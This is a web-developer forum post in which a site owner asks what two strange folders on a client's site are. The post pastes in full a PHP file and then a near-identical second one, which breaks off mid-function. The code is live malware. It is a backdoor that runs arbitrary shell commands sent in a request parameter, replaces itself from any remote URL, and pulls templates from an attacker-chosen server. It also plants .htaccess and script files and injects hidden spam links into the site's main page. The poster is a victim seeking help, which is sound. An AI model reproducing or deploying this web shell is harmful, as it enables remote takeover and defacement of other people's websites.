Jump to content
Killersites Forums

What is this strange file????


Andrea
 Share

Recommended Posts

I was just looking at a client's site and noticed two very strange folders that I have nothing to do with. One is called bpbhl and contains only one file - qxn.php which has this in it:

 

Sorry this is so long, but since I have no clue what might be essential and what not, I figure I better post everything. Can anyone tell what this might be about? I'm concerned.

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>

The other folder is called euhdy and contains error_log, tur.php, and w.txt (is empty). tur.php contains

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
unlink("c");
unlink("1r.txt");
unlink("2r.txt");
unlink("log");
}

function Clear2()
{
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
$fin = ereg_replace("<!--dd4-->", "", $fin);
$fin = ereg_replace("<!--dd5-->", "", $fin);
$fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
echo " upt-ok";
}

function GetVar($name, &$var)
{
$var = "";
if (isset($_POST[$name]))
	$var = $_POST[$name];

if (isset($_GET[$name]))
	$var = $_GET[$name];

if (($var) =="")
return false;
else return true;
}


function GenNew()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
mkdir($tname);
fwrite($fconf, $tname);
	$pid = 0;
	$fht = fopen("$tname/.htaccess", "w+");

	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 
}
$gname = $sg."sgen.php";
for ($j=$pid; $j<$pid+10; $j++)
{

	$fc = ""; 
	$fp = fopen($gname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$arr = explode("</html>", $fin);
	//print_r($arr);
	$curs = trim($arr[1]);

	$newf = "$tname/$curs/";
	echo "$newf";
	mkdir($newf);
	$fnd = fopen("$tname/$curs/$curs".".php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	fwrite($fr, "$tname/$curs/$curs".".php\n");


}

}

function Gen2()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
$md = false;
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

	if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

	if (isset($_GET["md"]))
	$md = true; 

$path = "";
$fr = fopen("1r.txt", "a+");
$f2r = fopen("2r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$i_dor = trim($fconf[0]);
	$i_dor = $i_dor+0;
}
else 
{
	$fconf = fopen("c", "w+");
	$rnd = mt_rand(0, 999);
	$nm = "";
	for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}

	fwrite($fconf, "0\n");
	$pid = 0;
	$fht = fopen(".htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 


$fht = fopen("2.js", "w+");
	$htname = $sg."2js.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht); 



	$f1t = fopen("1t", "w+");
	$f1tname = $sg."1t.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 

	$f1t = fopen("1g", "w+");
	$f1tname = $sg."1g.php";
	$fp = fopen($f1tname, "r");
	$fin = '';
	while (!feof($fp))
	{
 $fc = fgets($fp, 1024);
 if (!$fc) break;
 	$fin .= $fc;
	}
	fclose($fp);
	fwrite($f1t, $fin);
	fclose($f1t); 


}
$i_dor++;
$i_dor--;
$a1t = file("1t");
$a1g = file("1g");
$ar1 = array("<li>","<p>","<br>");
$ar2 = array("</li>","</p>","<br>");
$gname = $sg."sgen2.php";
for ($j=$pid; $j<$pid+10; $j++)
{
	$rndo = mt_rand(0,count($ar1)-1);
	$ob1 = $ar1[$rndo];		
	$ob2 = $ar2[$rndo];	
	$cth = trim($a1t[$i_dor]);
	$tmp1 = explode("||", $cth);
	$cth = $tmp1[1];
	$curname = $tmp1[0];
	$i_dor++;
	$fc = ""; 
	$fp = fopen($gname."?th=$cth", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);


preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle );
$mtitle = trim($mtitle[0][0]);
$mtitle = strip_tags($mtitle);
$keyr1 = ereg_replace(" ", "+", $mtitle);	
$keyr1 = ereg_replace("\n","", $keyr1);
//echo "keyr=$keyr1";
$fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r");
	$yahp = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $yahp .= $fc;
	}
fclose($fp);



preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles );

$titles = $titles[0];
for ($i=0; $i<count($titles); $i++)
{
	$titles[$i] = strip_tags($titles[$i]);
}



preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs );


$decs = $decs[1];
for ($i=0; $i<count($decs); $i++)
{
	$decs[$i] = strip_tags($decs[$i]);
}


for ($i=3; $i<count($titles); $i++)
{
	$fin = ereg_replace("<KEYT$i>", $titles[$i], $fin);
}


for ($i=0; $i<count($decs); $i++)
{
	$fin = ereg_replace("<KEYD$i>", $decs[$i], $fin);
}

for ($i=0; $i<100; $i++)
{
	$fin = ereg_replace("<KEYD$i>", "", $fin);
	$fin = ereg_replace("<KEYT$i>", "", $fin);
}


		$links ="";

	if (($i_dor<192) || ($i_dor>199))
	{
		$rlink1 = mt_rand(1,4);

		while (true) {
			$rlink2 = mt_rand(1,4);
			if ($rlink2!=$rlink1) {
				break;
			}
		}


		$srnd = mt_rand(3,8);
		$links1 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin);

		$srnd = mt_rand(3,8);
		$links2 = "";
		for ($y=0; $y<$srnd; $y++)
		{
			$rndi = mt_rand(0,299);
			$rth = trim($a1t[$rndi]);
			$links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n";
			$rnd = mt_rand(1,7);
			if ($rnd==5)
			{
				$srndo = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srndo]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}

		}
		$fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin);

	}


	if ($i_dor==192)
	{
		$links1 = "";
		$links2 = "";
		$links3 = "";
		$links4 = "";

		for ($y=0; $y<80; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}

		$fin = ereg_replace("<LINKSM1>", $links1, $fin);
		for ($y=80; $y<160; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM2>", $links2, $fin);
		for ($y=160; $y<240; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n";
		}
		$fin = ereg_replace("<LINKSM3>", $links3, $fin);
		for ($y=240; $y<320; $y++)
		{
			$rth = trim($a1t[$y]);
			$tmp1 = explode("||", $rth);
			$rth = $tmp1[0];
			$mname = $tmp1[1];
			$rnd = mt_rand(1,5);
			if ($rnd==5)
			{
				$srnd = mt_rand(0,count($a1g)-1);
				$exl = trim($a1g[$srnd]);
				$exla = "http://".$exl;
				$links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n";
			}
			$links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n";
		}
		$fin = ereg_replace("<LINKSM4>", $links4, $fin);

	}


			$fin = ereg_replace("<LINKSD1>", "", $fin);
		$fin = ereg_replace("<LINKSD2>", "", $fin);
		$fin = ereg_replace("<LINKSD3>", "", $fin);
		$fin = ereg_replace("<LINKSD4>", "", $fin);

 $fin = ereg_replace("<LINKSM1>", "", $fin);
		$fin = ereg_replace("<LINKSM2>", "", $fin);
		$fin = ereg_replace("<LINKSM3>", "", $fin);
		$fin = ereg_replace("<LINKSM4>", "", $fin);

$curs = $cth;

$fnd = fopen("$curname".".php", "w+");
fwrite($fnd, $fin);
fclose($fnd);
if (($md) && ($i_dor==192 ))
{
	fwrite($fr, "$curname".".php||$curs\n");
}
if (($md) && ($i_dor!=192 ) )
{
	fwrite($f2r, "$curname".".php||$curs\n");
}
}

$fconf = fopen("c", "w+");
fwrite($fconf, $i_dor."\n");
fclose($fconf);
}

function Gen()
{
$alp = "abcdefghiklmnjsweqrtyuiopzx";
$maps = array();
if (isset($_POST["sg"]))
	$sg = $_POST["sg"];

if (isset($_GET["sg"]))
	$sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
$g = $_POST["gm"];

if (isset($_GET["gm"]))
	$g = $_GET["gm"];


$path = "";
$fr = fopen("1r.txt", "a+");
if (file_exists("c"))
{
	$fconf = file("c");
	$tname = trim($fconf[0]);
	$cname = trim($fconf[1]);
	$curs = trim($fconf[2]);
	$pid = trim($fconf[3]);
	if ($pid == 100)
	{
		$pid = 0;
		$rnd = mt_rand(0, 999);
		$nm = "";
	for ($i=0; $i<3; $i++)
	{
 	$ran = mt_rand(0,26);
 	$sym = $alp[$ran];
 	$nm = $nm.$sym;
 }
		$cname = $nm;
		mkdir("$tname/$cname");
		$curs = $g;
	}
}
else 
{
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<5; $i++)
	{
		$ran = mt_rand(0,26);
		$sym = $alp[$ran];
		$nm = $nm.$sym;
	}
	$tname = $nm;
	$pid = 0;
	$curs = $g;
	mkdir($tname);
	$fht = fopen("$tname/.htaccess", "w+");
	$htname = $sg."2.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	fwrite($fht, $fin);
	fclose($fht);
	$rnd = mt_rand(0, 999);
	$nm = "";
for ($i=0; $i<3; $i++)
	{
	$ran = mt_rand(0,26);
	$sym = $alp[$ran];
	$nm = $nm.$sym;
}
	$cname = $nm;
mkdir("$tname/$cname");
}
$gname = $sg."sgen.php";
